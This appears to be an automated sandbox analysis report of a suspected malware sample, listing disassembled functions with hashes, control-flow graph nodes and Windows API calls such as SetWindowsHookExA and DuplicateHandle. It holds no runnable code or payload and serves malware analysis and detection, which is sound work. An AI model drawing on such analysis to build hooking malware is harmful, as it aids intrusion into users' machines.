                                            • Instruction ID: b24fbf1cad4b25bd08378ef9c229d0aedb6a0f0ea26d7aa1e33ae6c4de098f6d
                                            • Opcode Fuzzy Hash: 25b11d1cfdde839ca3cd3f7a79e7cff116c6255a33e38cb3f2a16375a8df955e
                                            • Instruction Fuzzy Hash: A43123B0D00208DFDB10CF99C999B8DBBF5BF48304F21805AE404BB2A0D7B4A945CF95
                                            Function 0655FE21 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1425 655fe21-655fe24 1426 655fe26-655fe72 1425->1426 1427 655fe7a-655fe7c 1425->1427 1429 655fe7e-655fe87 1426->1429 1435 655fe74 1426->1435 1427->1429 1430 655fe91-655feb0 SetWindowsHookExA 1429->1430 1431 655fe89-655fe8e 1429->1431 1433 655feb2-655feb8 1430->1433 1434 655feb9-655fed9 1430->1434 1431->1430 1433->1434 1435->1427
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0655FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: d12d3a3fa0da437b9c021d67adc761870f3ffd610ac94778f66fc91687e6e564
                                            • Instruction ID: 889341ac88ceeaa21fe12fc81c32515c618080989e0080144201e6e82dac3a6e
                                            • Opcode Fuzzy Hash: d12d3a3fa0da437b9c021d67adc761870f3ffd610ac94778f66fc91687e6e564
                                            • Instruction Fuzzy Hash: 9F2144B19002499FCB54CFA9D888BDEFFF5FB89320F14801AE859A7251C7746945CFA1
                                            Function 0655C6F0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1438 655c6f0-655c78c DuplicateHandle 1439 655c795-655c7b2 1438->1439 1440 655c78e-655c794 1438->1440 1440->1439
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0655C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: f997efc5cc3fb255affa6bf2cb240fca0cec400467848a517ca087873dc30fb0
                                            • Instruction ID: 093196f62f844e5c66fe1ad76022928c017ae56d1a3b150974b9dc859ddce7f1
                                            • Opcode Fuzzy Hash: f997efc5cc3fb255affa6bf2cb240fca0cec400467848a517ca087873dc30fb0
                                            • Instruction Fuzzy Hash: CC21E3B5D002599FDB10CFA9D584AEEBFF5FB48310F14801AE958A7250D374A941CFA4
                                            Function 0655C6F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1443 655c6f8-655c78c DuplicateHandle 1444 655c795-655c7b2 1443->1444 1445 655c78e-655c794 1443->1445 1445->1444
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0655C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 10213dbe3e9bcb76f5480b276b9e045f900bb4b3665847e4a564b392af15534e
                                            • Instruction ID: ee6156ae3d5fbe1c2124c55a34835a9484222a44d7bd0c65762200cebf765010
                                            • Opcode Fuzzy Hash: 10213dbe3e9bcb76f5480b276b9e045f900bb4b3665847e4a564b392af15534e
                                            • Instruction Fuzzy Hash: DA21E0B59002189FDB10CFAAD984ADEBBF8FB48320F14801AE918A7210D374A940CFA4
                                            Function 0655FE28 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1448 655fe28-655fe72 1450 655fe74-655fe7c 1448->1450 1451 655fe7e-655fe87 1448->1451 1450->1451 1452 655fe91-655feb0 SetWindowsHookExA 1451->1452 1453 655fe89-655fe8e 1451->1453 1455 655feb2-655feb8 1452->1455 1456 655feb9-655fed9 1452->1456 1453->1452 1455->1456
                                            APIs
                                            • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0655FEA3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: ffe1390d855519f21adaaa03e3db96ce3299e9b3a619a224bf941f45e1b7063f
                                            • Instruction ID: 71901400102c6519a6587fbed2d309c0082839c5877fb887d1645c964d8e2c3f
                                            • Opcode Fuzzy Hash: ffe1390d855519f21adaaa03e3db96ce3299e9b3a619a224bf941f45e1b7063f
                                            • Instruction Fuzzy Hash: 722108B5D002099FDB54DF99C848BDEFBF5FB88320F10842AD459A7250C774A945CFA5
                                            Function 06555E54 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06557956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: cb22af5d76ffdb6287ca103438ea66480a212165df9d71b9f1e644421360439b
                                            • Instruction ID: 3debefce52f3ff3955a7c80818d2bc590c483cb5d7b67ae99243ad59fc829da6
                                            • Opcode Fuzzy Hash: cb22af5d76ffdb6287ca103438ea66480a212165df9d71b9f1e644421360439b
                                            • Instruction Fuzzy Hash: 76112DB5C002498FCB10CF9AC848ADEFBF4EB88224F10842AD869B7200C374A545CFA5
                                            Function 065578EA Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06557956
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 1db84d07628600eed197fea11077985ea74f6339b425792ee5694e17822353d4
                                            • Instruction ID: 5b8e5ebc86efe09dc015b25232379659d7879ab3b42e9585971bfcb21254a91a
                                            • Opcode Fuzzy Hash: 1db84d07628600eed197fea11077985ea74f6339b425792ee5694e17822353d4
                                            • Instruction Fuzzy Hash: 3C11F0B5C002498FDB10DF9AC844ADEFBF4AB89220F10845AD869B7310C375A546CFA5
                                            Function 0655E189 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: bd5ea430e54e830abcf5432f16cd32c9bd17a0ccf2936e25472e27685b3ab4ca
                                            • Instruction ID: aedbb6e120fe5daee1ff11239e35c8f0f67b5dc1914891f80d4079b4ad71601d
                                            • Opcode Fuzzy Hash: bd5ea430e54e830abcf5432f16cd32c9bd17a0ccf2936e25472e27685b3ab4ca
                                            • Instruction Fuzzy Hash: 711145B58003488FDB20CF9AC949BDEFFF8EB48320F20845AE558A3210C374A544CFA5
                                            Function 0655C304 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0655D89D), ref: 0655D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 5125a3a0e8ac92ffe9308be41f08767b1da2f108f11138cc52dbd202b245a78c
                                            • Instruction ID: 1edc2a5c144bba1dd8798df85055780e3fac515d533188934ffe1597ae9d52f1
                                            • Opcode Fuzzy Hash: 5125a3a0e8ac92ffe9308be41f08767b1da2f108f11138cc52dbd202b245a78c
                                            • Instruction Fuzzy Hash: 691103B5800249CFDB50DF9AD548BDEFBF4FB48324F20846AD959A7250C374A944CFA9
                                            Function 0655DBB0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 754a8ab9e8c204d56ad2a700c50008a378c2669dc37823c9d404addee5e0efbe
                                            • Instruction ID: a84586f57593ded17a316a0028934a7a62356312aa3c87763d362568be8fa1a3
                                            • Opcode Fuzzy Hash: 754a8ab9e8c204d56ad2a700c50008a378c2669dc37823c9d404addee5e0efbe
                                            • Instruction Fuzzy Hash: 511103B5900349CFDB20DF9AC549BDEBBF4EB48324F20845AE959A7210C374A944CFA5
                                            Function 0655DBAD Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0655E1E5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: fcae8bcff9b66bdfa6e3f36eb5188b69c19cf53268684bbce78dcd6aad8c58b4
                                            • Instruction ID: c31af338cb346d0343d554685c65b0b61ae468a4fbf2a4ad9302e1cd723adf82
                                            • Opcode Fuzzy Hash: fcae8bcff9b66bdfa6e3f36eb5188b69c19cf53268684bbce78dcd6aad8c58b4
                                            • Instruction Fuzzy Hash: 141133B59003488FDB10CF9AC949BCEBBF4AB48320F20841AE558A7210C374AA44CFA5
                                            Function 0655D8C0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0655D89D), ref: 0655D927
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1896818129.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6550000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 0169afdac00d39e99cc030f4b9e775fe043696de5e70c996c4c7ac81cda32593
                                            • Instruction ID: ff2ea22a62275c5118bba2d373d86d1cc93098ab23f3f94fe34447c7b503c020
                                            • Opcode Fuzzy Hash: 0169afdac00d39e99cc030f4b9e775fe043696de5e70c996c4c7ac81cda32593
                                            • Instruction Fuzzy Hash: 551103B5800249DFCB10DF9AD548BDEFBF4FB88324F20846AD958A7650C374A944CFA5
                                            Function 02F63E84 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 4f421788ed2dd5d0d0c0207fc5f05f8f08b5f2e29fdd8e6e0671fc5117770ff3
                                            • Instruction ID: 618c5a11bec61e33a61fe3d4150b54e7720160084cc8adb4357dc485b50a54ed
                                            • Opcode Fuzzy Hash: 4f421788ed2dd5d0d0c0207fc5f05f8f08b5f2e29fdd8e6e0671fc5117770ff3
                                            • Instruction Fuzzy Hash: 66916D70E00209DFDB24DFA8D9897EEBBF2EF88758F148129E514A7254DB749885CF81
                                            Function 02F6EEC5 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: a80d67f2f231f265d71f0baa38f2476d64854b37b40d976a937a8c1c86d4ed5a
                                            • Instruction ID: 841e9997774278b52d233339c9d17e8aa840739913ddfb52172a8cc81afd68c7
                                            • Opcode Fuzzy Hash: a80d67f2f231f265d71f0baa38f2476d64854b37b40d976a937a8c1c86d4ed5a
                                            • Instruction Fuzzy Hash: ED310031B003058FDB169B34D558A7E7BE2EB89A80F144829E406DB395DF39DC46C7A1
                                            Function 02F671F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: cfb86e7f7d305afd7c5e2d1437c95d431041d6b617e34ea9bedd607ffbc1c7c2
                                            • Instruction ID: aefc28626a5b9832952fa4eb9aaeb609975e1d03d58b1ada2fc4f8d749a7d07c
                                            • Opcode Fuzzy Hash: cfb86e7f7d305afd7c5e2d1437c95d431041d6b617e34ea9bedd607ffbc1c7c2
                                            • Instruction Fuzzy Hash: 45315C31E102099BDB15DFA5D4487AEF7B2FF85358F208525FA05EB250EB70A842CB91
                                            Function 02F671E8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q
                                            • API String ID: 0-2625958711
                                            • Opcode ID: a319213dc85cf49ee28be5004a731947d0a3fb9910813f08aaa245286a5ffb51
                                            • Instruction ID: 831a73043e119a5b89c1177d7f775dd63963a6c53ccf1b78b8a4fff8b39b12c2
                                            • Opcode Fuzzy Hash: a319213dc85cf49ee28be5004a731947d0a3fb9910813f08aaa245286a5ffb51
                                            • Instruction Fuzzy Hash: 69318F31E102098BDB14DFA5C8887AEF7B2FF45348F208529F901EB250EB70A842CB51
                                            Function 02F68E5C Relevance: .4, Instructions: 371COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 377018555b9a32544b9edd769a208592a1253ba226d7f442c973249ee2a8dbb5
                                            • Instruction ID: 5cbcf86ed17ae51ef64caf3bb27ea6a9a0a3c4bcef5c0d70974101d6deef6a64
                                            • Opcode Fuzzy Hash: 377018555b9a32544b9edd769a208592a1253ba226d7f442c973249ee2a8dbb5
                                            • Instruction Fuzzy Hash: 73D18E34B002059FDB14DFA8D988AADB7F2FB88354F244469E506EB394DB75DC46CB81
                                            Function 02F67780 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be28a9f13ca7d79c36b5e34e5904dd21fa03e085cbaafdf0d538c3c479b9f289
                                            • Instruction ID: 5865352f7e5664baf2b032144ea727216cffbedc1b492dfe57c86e28bcdaf3d6
                                            • Opcode Fuzzy Hash: be28a9f13ca7d79c36b5e34e5904dd21fa03e085cbaafdf0d538c3c479b9f289
                                            • Instruction Fuzzy Hash: 99B162307002068FDB55AB38F554729B7A2FB99758F505939E106CB369CF36DC86C781
                                            Function 02F64A9C Relevance: .3, Instructions: 262COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d2c9a7d111c0f3a339a07f52f7f9e2c6a49affb2f3bc917064cfb4f957c293d
                                            • Instruction ID: d7882c09ad6b0205cc847f2ad44404ddbcf3f8142d17d96cd863216a11737d3c
                                            • Opcode Fuzzy Hash: 7d2c9a7d111c0f3a339a07f52f7f9e2c6a49affb2f3bc917064cfb4f957c293d
                                            • Instruction Fuzzy Hash: BCB15C70E0020A8FDB20DFA8D9897ADBBF2FF48754F148129D915E7394EB749885CB91
                                            Function 02F69398 Relevance: .2, Instructions: 215COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ac858ac5a28343baaf790e7380dc3dcc6d50dead332ce2e5c21d2792a2d443a
                                            • Instruction ID: a8a5e7f2f20eac3c1f34a40c2a3a291ee354deaa2e18c7ea7f1230d937c37f5a
                                            • Opcode Fuzzy Hash: 4ac858ac5a28343baaf790e7380dc3dcc6d50dead332ce2e5c21d2792a2d443a
                                            • Instruction Fuzzy Hash: E9716B71A002058FDB14CF69D984BA9BBF6FF88314F14C169EA09AB395DBB1D844CB90
                                            Function 02F691D8 Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73787e9f6d1bd59b55aeb213caa2c36afb414f1b31b812c96314526e075a77fe
                                            • Instruction ID: ae05ee289722dad16000eb16c5ca73016f08aa7b8f8a5e746601bb459fbe1e97
                                            • Opcode Fuzzy Hash: 73787e9f6d1bd59b55aeb213caa2c36afb414f1b31b812c96314526e075a77fe
                                            • Instruction Fuzzy Hash: ED41C671F002068BDF208AA9C98477FB7B5EB86754F20086AD61ADB381D774DC46C782
                                            Function 02F66CF0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ac0c58f1968076e79be444aff96fec89289bbe928801e8264e71e5a7614ff11
                                            • Instruction ID: 9ec6d9771a315e1c7e107d4f97edc9a5d2ec5b759d566a6da1286c5812f9d086
                                            • Opcode Fuzzy Hash: 9ac0c58f1968076e79be444aff96fec89289bbe928801e8264e71e5a7614ff11
                                            • Instruction Fuzzy Hash: DC5114B4D002188FDB14CFAAC848BADBBF5FF48354F148129E81AAB355D778A845CF95
                                            Function 02F66CE6 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b56536bf46940147fa6112fe9bd9269381271f9d5861879c23ca3375a010840
                                            • Instruction ID: 82190f73a7ad98586e753dde0dc99a31f732dcd5d24b59a05d630941493ba0cc
                                            • Opcode Fuzzy Hash: 3b56536bf46940147fa6112fe9bd9269381271f9d5861879c23ca3375a010840
                                            • Instruction Fuzzy Hash: 145115B4D002188FDB14CFA9C848BADBBF5FF48354F148119E81AAB355D778A845CF95
                                            Function 02F6112A Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea725f60a49b3a550c916ce864a28cd5907b70772d6564cfb333c77dc0dd2f7f
                                            • Instruction ID: 2982c4dcb6a9a56d3574e2456ed556788b012d43fdf19a557424cfb5500cfe32
                                            • Opcode Fuzzy Hash: ea725f60a49b3a550c916ce864a28cd5907b70772d6564cfb333c77dc0dd2f7f
                                            • Instruction Fuzzy Hash: CD513E34641249CFD705DB7AFA909547FB1F79A30478586A8D0044B33ADB386DCADB92
                                            Function 02F61138 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd59089dffd22a67d218809a2e5101ca137746a1389c39e0f4787c3a9e1a1a86
                                            • Instruction ID: c30edc6b6ab0a603bef8eaeeba2dd3fba23e58915e099fc3b09d8e0412a003c2
                                            • Opcode Fuzzy Hash: fd59089dffd22a67d218809a2e5101ca137746a1389c39e0f4787c3a9e1a1a86
                                            • Instruction Fuzzy Hash: 4251FD30641249CFC705DB7AFA909587FB1F79A30478586A9D0044B33ADB386DCADF92
                                            Function 02F626EC Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7569635aef83a870e2cc1bedc6e1cf970c30e540bdca0edc4e6b37a01c21b16d
                                            • Instruction ID: d67af9de4769a1c33908d5ce0438efeadf99f73ab02fc5f2ddffbb5064d21eb0
                                            • Opcode Fuzzy Hash: 7569635aef83a870e2cc1bedc6e1cf970c30e540bdca0edc4e6b37a01c21b16d
                                            • Instruction Fuzzy Hash: D441F2B1D0024D9FDB10DFA9C984ADEBFF5FF48314F148029E819AB254DB74A94ACB90
                                            Function 02F6ED88 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 224c9143f2750ca4fa3fee34f54f74ca5b7ca5c55b6845abc77a55ca24d00f73
                                            • Instruction ID: d5b8c79ef6a4f37eda372783caf432235e5d146159bd7949e004db8106659dc2
                                            • Opcode Fuzzy Hash: 224c9143f2750ca4fa3fee34f54f74ca5b7ca5c55b6845abc77a55ca24d00f73
                                            • Instruction Fuzzy Hash: EF317035E006059BDB15CFA5D858BAEB7B2FF89300F148919E916E7380DB70EC46CB50
                                            Function 02F650A8 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: caf864d9e473823f1d75a6d904154e8c66509532a6677044537081db69a84b89
                                            • Instruction ID: b716cd8078a32b952f963c2e3cfc5bb831c33604c2287faaf0b02f2de52b8af7
                                            • Opcode Fuzzy Hash: caf864d9e473823f1d75a6d904154e8c66509532a6677044537081db69a84b89
                                            • Instruction Fuzzy Hash: E8313C34A002159FEB24DB34CA186BE77B6EF49385F5005B8D905BB350DB3ADD46CB92
                                            Function 02F6ED98 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90f075f28dc86a6fa948d652837252fe175884f8e0b5a14142ec71f8053d7c33
                                            • Instruction ID: 56218bcd40ab8d028f7e2b8a378836200c3a0d2c40c827fbeba80ea8144dcb66
                                            • Opcode Fuzzy Hash: 90f075f28dc86a6fa948d652837252fe175884f8e0b5a14142ec71f8053d7c33
                                            • Instruction Fuzzy Hash: 66317035E006059BDB15CFA5D898AAEB7F2FF89340F148929E916E7350DB70EC86CB50
                                            Function 02F626F8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d18b1d93ad246fd668d3579755ca4f612d01522dc9587c277f23ee861f2279f
                                            • Instruction ID: 93b4dcb69205bc112161f1886c13678e5f0b8d2e43859f2f7898f0830751f888
                                            • Opcode Fuzzy Hash: 6d18b1d93ad246fd668d3579755ca4f612d01522dc9587c277f23ee861f2279f
                                            • Instruction Fuzzy Hash: 3F41EEB0D0024D9FDB10DFA9C984ADEBFF5EF48314F24802AE819AB254DB75A945CB90
                                            Function 02F650B8 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
